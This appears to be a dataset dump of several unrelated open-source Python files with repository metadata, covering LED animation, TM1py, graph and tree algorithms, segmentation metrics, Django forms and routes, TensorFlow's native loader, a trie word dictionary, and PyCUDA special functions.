        self.next_func = None
    def call_func(self, func, x, y, s):
        # Evaluate funcs[func] and map its value onto a hue in [0, 360).
        return abs(int(self.funcs[func](x, y, s))) % 360
    def step(self, amt=1):
        # NOTE(review): the `if self.next_func:` truthiness checks below
        # treat a pending index of 0 the same as None, so a fade into
        # funcs[0] is skipped — `is not None` was presumably intended;
        # confirm before changing.
        self.layout.all_off()
        for y in range(self.height):
            for x in range(self.width):
                h = self.call_func(self.cur_func, x, y, self._step)
                if self.next_func:
                    # Mid-fade: blend the current and upcoming hues.
                    h_next = self.call_func(self.next_func, x, y, self._step)
                    h = hue_fade(h, h_next, self.fade_step * self.fade_count)
                c = colors.hue2rgb_360(h)
                self.layout.set(x, y, c)
        if self.next_func:
            # Advance the fade; when done, promote next_func to current.
            self.fade_count += 1
            if self.fade_count >= self.fade_frames:
                self.cur_func = self.next_func
                self.next_func = None
                self.fade_count = 0
                self.count = 0
        else:
            self.count += 1
        if not self.next_func and self.frames_per and self.count >= self.frames_per:
            # Time to schedule the next function (random or sequential).
            if self.rand:
                self.next_func = random.choice(range(len(self.funcs)))
            else:
                self.next_func = self.cur_func + 1
                if self.next_func >= len(self.funcs):
                    self.next_func = 0
                self.state = 2
            self.count = 0
            if not self.fade_frames:
                # No fading configured: switch immediately.
                self.cur_func = self.next_func
                self.next_func = None
        self._step += amt
| [
"adammhaile@gmail.com"
] | adammhaile@gmail.com |
35b54fd11d79356160dff0313c1e493c06a17499 | a373cdb4107e099ce31eaa0f7620292c6154d860 | /Metadata/dim_hierarchy_get_default_member.py | 50ba4c0431c1f79885b4e68a9fe079d3313bcfa3 | [
"MIT"
] | permissive | jamiros/tm1py-samples | 2a562337baebc2dcbbefd76d64c4c8f20e98810a | a398ae8744dcf19b5aa045a87d878bf18c903cc6 | refs/heads/master | 2022-02-23T14:42:22.404148 | 2019-10-01T21:32:10 | 2019-10-01T21:33:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | """
When a dimension of a cube is not explicitly referenced in an MDX Query,
TM1 will implicitly use the DefaultMember for the missing dimension.
If no DefaultMember is defined in TM1, it will use the element with index 1.
You can use TM1py to query and update the default member for a Hierarchy
"""
import configparser
from TM1py.Services import TM1Service
# Read TM1 connection settings from the shared config file.
config = configparser.ConfigParser()
config.read(r'..\config.ini')
# Connect to the 'tm1srv02' instance and look up the default member that
# TM1 falls back to when the Date dimension is omitted from an MDX query.
with TM1Service(**config['tm1srv02']) as tm1:
    current_default_member = tm1.dimensions.hierarchies.get_default_member(
        dimension_name="Date",
        hierarchy_name="Date")
    print("Current default member for dimension Date: " + current_default_member)
| [
"MariusWirtz2@gmail.com"
] | MariusWirtz2@gmail.com |
c6861e3d4dca9db411a177f6608f52cfa4d48142 | aac418419c2ef4d10c5c4ceb607d3d8329a5f395 | /Algorithms/Graph/Topological_Sorting.py | a67d9eb485275425187fa875ad930ae3a719ff68 | [] | no_license | sudhirshahu51/projects | bb13395227355ff84933b6d3a0f158ee42bcdceb | b2d8331d14d2163b20535368a60c81f6c8bc2c8f | refs/heads/master | 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,342 | py | # To implement Topological Sorting for directed graph
# Topological Sorting: if there is path from u to v then u comes before v in ordering
class Vertex:
    """A graph node: an identifier plus a weighted adjacency map."""
    def __init__(self, key):
        self.id = key
        self.connected = {}  # adjacent Vertex -> edge weight
        self.in_degree = 0   # count of incoming edges (maintained by Graph)
        self.status = 'tmp'
    def add_neighbor(self, nbr, weight=0):
        """Record an outgoing edge to Vertex ``nbr`` with the given weight."""
        self.connected[nbr] = weight
    def __str__(self):
        return f"{self.id}connected to{[peer.id for peer in self.connected]}"
    def get_connections(self):
        """View of all adjacent Vertex objects."""
        return self.connected.keys()
    def get_id(self):
        """This vertex's identifier."""
        return self.id
    def get_weight(self, nbr):
        """Weight of the edge to ``nbr``; raises KeyError if not adjacent."""
        return self.connected[nbr]
class Graph:
    """Directed graph keyed by vertex id; adjacency lives on Vertex objects."""
    def __init__(self):
        self.vertices_list = {}  # maps key -> Vertex
        self.vertices_num = 0

    def add_vertex(self, key):  # Add a vertex in the graph
        """Create a Vertex for ``key``, register it, and return it."""
        self.vertices_num += 1
        new_vertex = Vertex(key)
        self.vertices_list[key] = new_vertex
        return new_vertex

    def get_vertex(self, key):  # To return the vertex with the specified key
        """Return the Vertex stored under ``key``, or None if absent."""
        if key in self.vertices_list:
            return self.vertices_list[key]
        else:
            return None

    def __contains__(self, items):
        """True when ``items`` is a registered vertex key."""
        return items in self.vertices_list

    def add_edge(self, v1, v2, weight=1):
        """Add a directed edge v1 -> v2, creating either vertex if missing."""
        if v1 not in self.vertices_list:
            self.add_vertex(v1)
        if v2 not in self.vertices_list:
            self.add_vertex(v2)
        self.vertices_list[v1].add_neighbor(self.vertices_list[v2], weight)
        # Bug fix: the original referenced the module-level global ``g``
        # (g.get_vertex(v2)), which only worked for a Graph bound to that
        # exact name; operate on this instance instead.
        self.vertices_list[v2].in_degree += 1

    def get_vertices(self):
        """View of all vertex keys."""
        return self.vertices_list.keys()

    def __iter__(self):
        """Iterate over the Vertex objects themselves."""
        return iter(self.vertices_list.values())
class Queue:
    """Minimal FIFO queue backed by a plain Python list.

    Items enter at the tail and leave from the head, so the externally
    visible behavior is unchanged: front() is the next item to leave and
    rare() is the most recent arrival.
    """
    def __init__(self):
        self.items = []
    def __contains__(self, item):
        return item in self.items
    def is_empty(self):
        """True when no items are queued."""
        return len(self.items) == 0
    def enqueue(self, data):
        """Add ``data`` at the back of the queue."""
        self.items.append(data)
    def de_queue(self):
        """Remove and return the oldest item."""
        return self.items.pop(0)
    def size(self):
        """Number of queued items."""
        return len(self.items)
    def front(self):
        """Oldest item (next to be dequeued), without removing it."""
        return self.items[0]
    def rare(self):
        """Newest item, without removing it."""
        return self.items[-1]
def topological(g):
    """Topologically sort a directed Graph (Kahn's algorithm).

    Returns a list of Vertex objects such that every edge (u, v) places u
    before v, or None if ``g`` is not a Graph.  Vertices' ``in_degree``
    counters are consumed (mutated) by this routine.  A cyclic graph still
    fails with an IndexError once no zero in-degree vertex remains,
    matching the original behavior.
    """
    if not isinstance(g, Graph):
        return
    q = Queue()
    order = []
    pending = list(g.vertices_list.keys())
    # Keep going while any vertex is unqueued OR queued but not yet emitted.
    # (The original stopped as soon as the pending list emptied, which could
    # leave vertices still sitting in the queue out of the returned order.)
    while len(pending) != 0 or not q.is_empty():
        # Queue every vertex whose in-degree has dropped to zero.  Iterate
        # over a snapshot: the original removed from the list while
        # iterating it, silently skipping the element after each removal.
        for key in pending[:]:
            if g.get_vertex(key).in_degree == 0:
                q.enqueue(key)
                pending.remove(key)
        nxt = q.de_queue()
        order.append(g.get_vertex(nxt))
        for nbr in g.get_vertex(nxt).get_connections():
            nbr.in_degree -= 1
    return order
if __name__ == '__main__':
    # Demo: build a small 7-vertex DAG and print one topological ordering.
    g = Graph()
    for i in range(7):
        g.add_vertex(i)
    g.add_edge(0, 5)
    g.add_edge(0, 1)
    g.add_edge(1, 5)
    g.add_edge(1, 4)
    g.add_edge(2, 3)
    g.add_edge(2, 1)
    g.add_edge(3, 1)
    g.add_edge(3, 4)
    g.add_edge(4, 5)
    g.add_edge(6, 5)
    g.add_edge(6, 4)
    print(topological(g))
"deveshaggrawal19@gmail.com"
] | deveshaggrawal19@gmail.com |
af55e087aa75c1d2e0da2e2878b229a089ea5ed0 | 32ddd90c9f2b2037cb7fd0a338deefcf16e5d17d | /python/tree/sorted_array_to_bst.py | f060c74878b80931d55e37ccbd04bc5372c588a4 | [] | no_license | btoll/howto-algorithm | 2a671779a4abb279e2a55461c8cfd7094770b42a | 57ed65d97d951e3746f71190fb57813b519a1aa5 | refs/heads/master | 2023-02-20T17:17:38.600806 | 2023-02-10T05:16:22 | 2023-02-10T05:16:22 | 182,487,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from random import randint
import ipdb
class TreeNode:
    """Binary-tree node holding a value and two child links."""
    def __init__(self, value):
        # A node starts as a leaf; children are attached by the builder.
        self.value, self.left, self.right = value, None, None
def sorted_array_to_bst(nodes, left, right):
    """Build a height-balanced BST from the sorted slice nodes[left:right+1].

    The left-middle element of the range becomes the subtree root, and the
    two halves are converted recursively.  An empty range yields None.
    """
    if left > right:
        return None
    # Choose the left middle node of the range as this subtree's root.
    mid = (left + right) // 2
    subtree = TreeNode(nodes[mid])
    subtree.left = sorted_array_to_bst(nodes, left, mid - 1)
    subtree.right = sorted_array_to_bst(nodes, mid + 1, right)
    return subtree
nodes = [-10, -3, 0, 5, 9]  # sorted input for the balanced-BST builder
root = sorted_array_to_bst(nodes, 0, len(nodes) - 1)
| [
"benjam72@yahoo.com"
] | benjam72@yahoo.com |
4e08bf6ece5a6c2a9ade93b244d59c3220a2ce12 | df3eb06af5151b0a07ebdf3723aedd3a6cd98f5e | /day3/dengLuTest.py | 5e9494a4b3fd28ff603cf84b6c9ee04351872c1a | [] | no_license | zhile0624/selenium7th | fa4d8e1a2bdeda18c0170de09144fc052ce71d32 | 6731ce2d786625ba0945739ec2c3109b04cd1441 | refs/heads/master | 2020-03-21T10:42:38.832843 | 2018-06-24T08:50:46 | 2018-06-24T08:50:46 | 138,466,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,375 | py | # selenium执行javascript中的两个关键字: return(返回值) 和 arguments(参数)
import time
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
# Walkthrough script: log in to a local shop site, search for a product,
# add it to the cart, and start filling in a new shipping address whose
# region fields are <select> dropdowns.
driver = webdriver.Chrome()
driver.get("http://localhost")
driver.implicitly_wait(20)
# Find the login link (link text is the Chinese word for "login").
# Selenium's find_element_by_link_text is usually far simpler than the
# equivalent document.getElementsByClassName(...) JavaScript lookup, and
# both resolve to the same element.
login_link = driver.find_element_by_link_text("登录")
# execute_script receives login_link as arguments[0], so this effectively
# runs login_link.removeAttribute('target') — the link then opens in the
# same window instead of a new one.  `arguments` is the array of all
# parameters passed after the JS string; usually only arguments[0] is used.
driver.execute_script("arguments[0].removeAttribute('target')", login_link)
login_link.click()
# Log in: type the user name, TAB to the password field, type the password,
# then press ENTER to submit.
driver.find_element_by_id("username").send_keys("changcheng")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123654").send_keys(Keys.ENTER).perform()
# Return to the shop front page (link text: "enter the shop").
driver.find_element_by_link_text("进入商城购物").click()
# Search for "iphone".
driver.find_element_by_name("keyword").send_keys("iphone")
driver.find_element_by_name("keyword").submit()
# Click the product without opening a new window, again by stripping the
# target attribute from its parent <a> (the <img> has no target).  The
# copied CSS selector was shortened by hand; ">" separates parent from
# child, a leading "." is a class, and ":nth-child(2)" means the element
# is the second child of its parent.
product_link_css = "div.protect_con > div:nth-child(2) > div.shop_01-imgbox > a"
iphone = driver.find_element_by_css_selector(product_link_css)
driver.execute_script("arguments[0].removeAttribute('target')", iphone)
iphone.click()
# On the product detail page, add the item to the cart, then open the cart.
driver.find_element_by_id("joinCarButton").click()
# driver.find_element_by_class_name("shopCar_T_span3").click()
driver.find_element_by_css_selector(".shopCar_T_span3").click()
# Click the checkout button.  Writing both class names with dots and no
# space (".shopCar_btn_03.fl") targets one element by two classes at once.
driver.find_element_by_css_selector(".shopCar_btn_03.fl").click()
# Click "add new address".
driver.find_element_by_css_selector(".add-address").click()
# Fill in the recipient name and mobile number.
driver.find_element_by_name("address[address_name]").send_keys("张三")
driver.find_element_by_name("address[mobile]").send_keys("13123412345")
dropdown1 = driver.find_element_by_id("add-new-area-select")
# A <select> is a special kind of element: the plain WebElement API
# (click/send_keys) cannot pick an option, so Selenium provides the
# dedicated Select wrapper class.  Converting below does not change which
# element is referenced — it only unlocks the option-selection methods.
print(type(dropdown1))  # dropdown1 is a plain WebElement
select1 = Select(dropdown1)
print(type(select1))  # select1 is a Select wrapper around the same element
select1.select_by_value("320000")  # choose a province by option value
time.sleep(2)
select1.select_by_visible_text("辽宁省")  # or by the option's visible text
# The city dropdown has a dynamic id and a non-unique class, so fetch all
# elements with that class via find_elements and index into the result —
# similar to the JavaScript getElementsByClassName approach.
dropdown2 = driver.find_elements_by_class_name("add-new-area-select")[1]
Select(dropdown2).select_by_visible_text("沈阳市")
# find_elements_by_tag_name usually matches many elements, so the singular
# find_element_by_tag_name is rarely useful; indexing the plural result is
# the common pattern (the district dropdown is the third <select>).
dropdown3 = driver.find_elements_by_tag_name("select")[2]
Select(dropdown3).select_by_visible_text("铁西区")
# Next step (not implemented): click the save-address button.
"51Testing"
] | 51Testing |
71a6bd882187409a56532f89178daad5194be49b | b69e8fd894a6f5d865911c4ec0f0d8b92b2aa6ac | /torchtools/meters/vision/utils.py | bb0ebf46ae421b97d654ea8b785a79ef42f7d147 | [
"BSD-3-Clause"
] | permissive | Time1ess/torchtools | 7338d65de87e0665f7ec90b71cfa439c5bd20201 | 1c48591188827f8a7403162728f86229203354c5 | refs/heads/master | 2021-01-23T10:29:14.707874 | 2018-04-30T13:51:03 | 2018-04-30T13:51:03 | 102,616,366 | 20 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | #!/usr/bin/env python3
# coding: UTF-8
# Author: David
# Email: youchen.du@gmail.com
# Created: 2017-09-07 21:24
# Last modified: 2017-09-11 14:41
# Filename: utils.py
# Description:
import numpy as np
from PIL import Image
from torchvision import transforms as T
def fast_hist(label_true, label_pred, n_class):
mask = (label_true >= 0) & (label_true < n_class)
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
for lt, lp in zip(label_trues, label_preds):
hist += fast_hist(lt.flatten(), lp.flatten(), n_class)
acc = np.diag(hist).sum() / hist.sum()
acc_cls = np.diag(hist) / hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
def build_ss_img_tensor(result, palette):
"""
Build a Semantic result image from output with palette.
Parameters:
* result(torch.Tensor): H x W, pixel classification result
* palette(PIL.ImagePalette): Palette
Return:
* img(torch.Tensor): 3 x H x W
"""
img = Image.fromarray(np.uint8(result), mode='P')
img.putpalette(palette)
img = img.convert()
return T.ToTensor()(img)
| [
"youchen.du@gmail.com"
] | youchen.du@gmail.com |
82d6814e4d27a3788157089c8a2a263b4363893e | afea9757be324c8def68955a12be11d71ce6ad35 | /willyanealves/stock/forms.py | 407e6b50c4057c2d0a82a9414ea1c6e7e450cc88 | [] | no_license | bergpb/willyane-alves | c713cac3ec3a68005f3b8145985693d2477ba706 | 8b2b9922ba35bf2043f2345228f03d80dbd01098 | refs/heads/master | 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django import forms
from .models import Stock
class StockForm(forms.ModelForm):
    """ModelForm for creating and editing Stock records."""
    class Meta:
        # Bind the form to the Stock model.
        model = Stock
fields = '__all__' | [
"jocsadm@gmail.com"
] | jocsadm@gmail.com |
f0df8ddacc4971ea3a805b59733696e807131ade | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4344/codes/1601_820.py | db86b249dcf1f032dea7ef1432b9d829cfe91fe5 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #ade de notas de R$ 50
# Institute of Computing - UFAM
# Lab 01 - Ex 10 (20 / 05 / 2016)
# ATM withdrawal: break a positive, even amount into R$50, R$10 and R$2
# notes, printing one count per line (no output for invalid amounts).
VALOR = int(input("Qual o valor do saque? "))
if VALOR>0 and VALOR%2==0:
 nota50 = VALOR//50
 aux1 = nota50*50
 nota10 = (VALOR - aux1)//10
 aux2 = nota10*10
 nota2 = (VALOR-aux1-aux2)//2
 print(nota50)
 print(nota10)
 print(nota2)
# Quantid | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
102768d7be696f42c91dcd129d83ccad74435d56 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/pywrap_tensorflow.py | f216bccfdfe37ae2e5ed7e2535ac4c5360a2fd71 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 3,257 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""A wrapper for TensorFlow SWIG-generated bindings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import sys
import traceback
from tensorflow.python.platform import self_check
# Perform pre-load sanity checks in order to produce a more actionable error
# than we get from an error during SWIG import.
self_check.preload_check()
# pylint: disable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
# Probe for the optional module that manages dlopen flags explicitly.
try:
  # This import is expected to fail if there is an explicit shared object
  # dependency (with_framework_lib=true), since we do not need RTLD_GLOBAL.
  from tensorflow.python import pywrap_dlopen_global_flags
  _use_dlopen_global_flags = True
except ImportError:
  _use_dlopen_global_flags = False
# On UNIX-based platforms, pywrap_tensorflow is a SWIG-generated
# python library that dynamically loads _pywrap_tensorflow.so.
_can_set_rtld_local = (hasattr(sys, 'getdlopenflags')
                       and hasattr(sys, 'setdlopenflags'))
if _can_set_rtld_local:
  _default_dlopen_flags = sys.getdlopenflags()
# Temporarily adjust the dlopen flags, import the SWIG-generated extension,
# then restore the original flags; any ImportError is re-raised with a
# pointer to the install troubleshooting page.
try:
  if _use_dlopen_global_flags:
    pywrap_dlopen_global_flags.set_dlopen_flags()
  elif _can_set_rtld_local:
    # Ensure RTLD_LOCAL behavior for platforms where it isn't the default
    # (macOS). On Linux RTLD_LOCAL is 0, so this does nothing (and would not
    # override an RTLD_GLOBAL in _default_dlopen_flags).
    sys.setdlopenflags(_default_dlopen_flags | ctypes.RTLD_LOCAL)
  from tensorflow.python.pywrap_tensorflow_internal import *
  from tensorflow.python.pywrap_tensorflow_internal import __version__
  from tensorflow.python.pywrap_tensorflow_internal import __git_version__
  from tensorflow.python.pywrap_tensorflow_internal import __compiler_version__
  from tensorflow.python.pywrap_tensorflow_internal import __cxx11_abi_flag__
  from tensorflow.python.pywrap_tensorflow_internal import __monolithic_build__
  if _use_dlopen_global_flags:
    pywrap_dlopen_global_flags.reset_dlopen_flags()
  elif _can_set_rtld_local:
    sys.setdlopenflags(_default_dlopen_flags)
except ImportError:
  msg = """%s\n\nFailed to load the native TensorFlow runtime.\n
See https://www.tensorflow.org/install/errors\n
for some common reasons and solutions. Include the entire stack trace
above this error message when asking for help.""" % traceback.format_exc()
  raise ImportError(msg)
# pylint: enable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
| [
"v-grniki@microsoft.com"
] | v-grniki@microsoft.com |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714 | 47c4267477aac784a83ac241465263585637781d | /fb高频/211.py | 61dac80b450b518b05bf788a7dc59022fbacf1a3 | [] | no_license | MengSunS/daily-leetcode | af011a66213fabcec792c0f8280a03aa805a56ec | 22c76118bb46fadd2b137fd1a3d40e20fd7538e5 | refs/heads/main | 2023-08-21T21:35:19.250506 | 2021-10-12T00:23:09 | 2021-10-12T00:23:09 | 306,220,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class WordDictionary:
    """Word store supporting exact and '.'-wildcard search (LeetCode 211).

    Backed by a trie of ``TrieNode`` objects; a ``'.'`` in a search
    pattern matches any single character at that position.
    """

    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.root = TrieNode()

    def addWord(self, word: str) -> None:
        """Insert *word*, marking its final node as a complete word."""
        node = self.root
        for ch in word:
            # children is a defaultdict, so missing nodes are created lazily.
            node = node.children[ch]
        node.isWord = True

    def search(self, word: str) -> bool:
        """Return True if *word* (which may contain '.') is stored."""
        return self.dfs(self.root, 0, word)

    def dfs(self, node, i, word):
        """Recursively match ``word[i:]`` starting from *node*.

        Fix: the original could fall off the end of the '.' branch and
        implicitly return None (violating the declared bool contract);
        every path now returns an explicit bool.
        """
        if i == len(word):
            return node.isWord
        ch = word[i]
        if ch == '.':
            # Wildcard: succeed if any child matches the rest of the word.
            return any(self.dfs(child, i + 1, word)
                       for child in node.children.values())
        child = node.children.get(ch)
        if child is None:
            return False
        return self.dfs(child, i + 1, word)
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
| [
"sunx0585@umn.edu"
] | sunx0585@umn.edu |
5bc81745f1d0aa833f2ad310a6858f6d862fc629 | a1711d3ba173bcf39a1c6ea4aa91013501c090c3 | /0x0B-python-input_output/10-class_to_json.py | 974b65033cac85098a58c40e61f1c1fb93ac7c38 | [] | no_license | veeteeran/holbertonschool-higher_level_programming | 5115a28c5f9979a146b5c0ed6d9a9d64420dcf4b | 081705945b8a8850bd3b1c416c382637fae79646 | refs/heads/master | 2022-12-14T18:25:54.239460 | 2020-09-25T01:09:05 | 2020-09-25T01:09:05 | 259,425,025 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | #!/usr/bin/python3
"""Docstring for class_to_json"""
def class_to_json(obj):
    """Return a plain-dict view of *obj* suitable for JSON serialization.

    The returned dictionary maps the instance's attribute names to their
    values (simple data structures: list, dictionary, string, integer,
    boolean).

    Parameter:
        obj: instance of a Class
    """
    return vars(obj)
| [
"vietnamtran@gmail.com"
] | vietnamtran@gmail.com |
d4a2405378c3de1290dcd43aef5f65c68b279f6b | 386a5b505d77c9798aaab78495d0f00c349cf660 | /Prognos Project/Working/Piyush Jiwane Git/Project/SearchPortal/questionnaireApp/urls.py | a954ca7fb967835830274b6c83975983ed14e83b | [] | no_license | namratarane20/MachineLearning | 2da2c87217618d124fd53f607c20641ba44fb0b7 | b561cc74733b655507242cbbf13ea09a2416b9e2 | refs/heads/master | 2023-01-20T18:54:15.662179 | 2020-03-09T14:12:44 | 2020-03-09T14:12:44 | 237,597,461 | 0 | 0 | null | 2023-01-05T12:37:12 | 2020-02-01T10:22:20 | Python | UTF-8 | Python | false | false | 1,173 | py | from django.urls import path,re_path
from . import views
#
# urlpatterns = [
# path('', views.userLogin),
# path('mailVerification', views.mailVerification),
# path('searchKeyword', views.searchKeyword),
# path('uploadcsv', views.uploadcsv),
# path('homepage', views.toHomePage),
# path('indexfile', views.indexToElasticsearch)
# ]
# Route table for the search-portal app; all handlers live in
# questionnaireApp.views (imported above as `views`).
urlpatterns = [
    # Landing page and keyword search (plain and with a recent-search slug).
    path('', views.Home),
    path('searchKeyword', views.searchKeyword ,name="searchKeyword"),
    path('searchKeyword/<str:recentSearch>', views.recentSearchKeyword, name="recentSearchKeyword"),
    path('account/logout/', views.Logout),
    # Admin login and e-mail verification flow.
    path('adminLogin', views.adminLogin),
    path('adminMailVerification', views.adminMailVerification),
    # Elasticsearch indexing endpoints for the two document types.
    path('indexQuestionnaireFile', views.indexQuestionnaireFile),
    path('indexPoliciesFile', views.indexPoliciesFile),
    path('toHomePage', views.toHomePage),
    # Tag management.
    path('addToTags',views.addToTags),
    # path('dispalyTagName',views.dispalyTagName),
    path('destroyTag', views.destroyTagInformation),
    # NOTE(review): the leading '/' in this pattern is unusual for Django
    # path() routes — confirm it matches as intended.
    path("/<str:tagname>", views.displayTagInformation, name='displayTagInfo'),
    path('displayTagInformation',views.displayTagInformation),
]
| [
"namrata.ashok@impelsys.com"
] | namrata.ashok@impelsys.com |
66bd1d94ba94629eca7202be8c0653b0e0efebbb | f1cb404ea95f4527ffeaf6a7fe8db9a2a1990f12 | /scikits/cuda/special.py | 4a1081fee13facf5d7818ebdbded9cd221c4cb7f | [
"BSD-3-Clause"
] | permissive | sequoiar/scikits.cuda | c0821502b7dc90d818669e20f2fa1858f1a78e82 | 79b62904a726d45066351c38b4274b1ecc985e47 | refs/heads/master | 2020-12-25T07:39:47.594383 | 2011-03-30T14:39:20 | 2011-03-30T14:39:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,139 | py | #!/usr/bin/env python
"""
PyCUDA-based special functions.
"""
import os
from string import Template
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
import numpy as np
from misc import get_dev_attrs, select_block_grid_sizes, init, get_current_device
# Get installation location of C headers:
from . import install_headers
# Adapted from Cephes library:
sici_mod_template = Template("""
#include "cuSpecialFuncs.h"
#if ${use_double}
#define FLOAT double
#define SICI(x, si, ci) sici(x, si, ci)
#else
#define FLOAT float
#define SICI(x, si, ci) sicif(x, si, ci)
#endif
__global__ void sici_array(FLOAT *x, FLOAT *si,
FLOAT *ci, unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
FLOAT si_temp, ci_temp;
if (idx < N) {
SICI(x[idx], &si_temp, &ci_temp);
si[idx] = si_temp;
ci[idx] = ci_temp;
}
}
""")
def sici(x_gpu):
    """
    Sine/Cosine integral.

    Computes the sine and cosine integral of every element in the
    input matrix.

    Parameters
    ----------
    x_gpu : GPUArray
        Input matrix of shape `(m, n)`; dtype must be float32 or float64.

    Returns
    -------
    (si_gpu, ci_gpu) : tuple of GPUArrays
        Tuple of GPUarrays containing the sine integrals and cosine
        integrals of the entries of `x_gpu`.

    Raises
    ------
    ValueError
        If `x_gpu` has a dtype other than float32/float64.

    Examples
    --------
    >>> import pycuda.gpuarray as gpuarray
    >>> import pycuda.autoinit
    >>> import numpy as np
    >>> import scipy.special
    >>> import special
    >>> x = np.array([[1, 2], [3, 4]], np.float32)
    >>> x_gpu = gpuarray.to_gpu(x)
    >>> (si_gpu, ci_gpu) = sici(x_gpu)
    >>> (si, ci) = scipy.special.sici(x)
    >>> np.allclose(si, si_gpu.get())
    True
    >>> np.allclose(ci, ci_gpu.get())
    True
    """
    # Choose the single- or double-precision branch of the CUDA template.
    if x_gpu.dtype == np.float32:
        use_double = 0
    elif x_gpu.dtype == np.float64:
        use_double = 1
    else:
        raise ValueError('unsupported type')

    # Get block/grid sizes for a kernel launch covering every element:
    dev = get_current_device()
    block_dim, grid_dim = select_block_grid_sizes(dev, x_gpu.shape)

    # cache_dir=False disables PyCUDA's kernel cache when debugging to make
    # sure the compiled kernel is not cached; None uses the default cache:
    cache_dir=None
    sici_mod = \
             SourceModule(sici_mod_template.substitute(use_double=use_double),
                          cache_dir=cache_dir,
                          options=["-I", install_headers])
    sici_func = sici_mod.get_function("sici_array")

    # Allocate outputs with the same shape/dtype as the input and launch.
    si_gpu = gpuarray.empty_like(x_gpu)
    ci_gpu = gpuarray.empty_like(x_gpu)
    sici_func(x_gpu, si_gpu, ci_gpu,
              np.uint32(x_gpu.size),
              block=block_dim,
              grid=grid_dim)
    return (si_gpu, ci_gpu)
# Adapted from specfun.f in scipy:
e1z_mod_template = Template("""
#include <pycuda/pycuda-complex.hpp>
#define PI 3.1415926535897931
#define EL 0.5772156649015328
#if ${use_double}
#define FLOAT double
#define COMPLEX pycuda::complex<double>
#else
#define FLOAT float
#define COMPLEX pycuda::complex<float>
#endif
__device__ COMPLEX _e1z(COMPLEX z) {
FLOAT x = real(z);
FLOAT a0 = abs(z);
COMPLEX ce1, cr, ct0, kc, ct;
if (a0 == 0.0)
ce1 = COMPLEX(1.0e300, 0.0);
else if ((a0 < 10.0) || (x < 0.0 && a0 < 20.0)) {
ce1 = COMPLEX(1.0, 0.0);
cr = COMPLEX(1.0, 0.0);
for (int k = 1; k <= 150; k++) {
cr = -(cr * FLOAT(k) * z)/COMPLEX((k + 1.0) * (k + 1.0), 0.0);
ce1 = ce1 + cr;
if (abs(cr) <= abs(ce1)*1.0e-15)
break;
}
ce1 = COMPLEX(-EL,0.0)-log(z)+(z*ce1);
} else {
ct0 = COMPLEX(0.0, 0.0);
for (int k = 120; k >= 1; k--) {
kc = COMPLEX(k, 0.0);
ct0 = kc/(COMPLEX(1.0,0.0)+(kc/(z+ct0)));
}
ct = COMPLEX(1.0, 0.0)/(z+ct0);
ce1 = exp(-z)*ct;
if (x <= 0.0 && imag(z) == 0.0)
ce1 = ce1-COMPLEX(0.0, -PI);
}
return ce1;
}
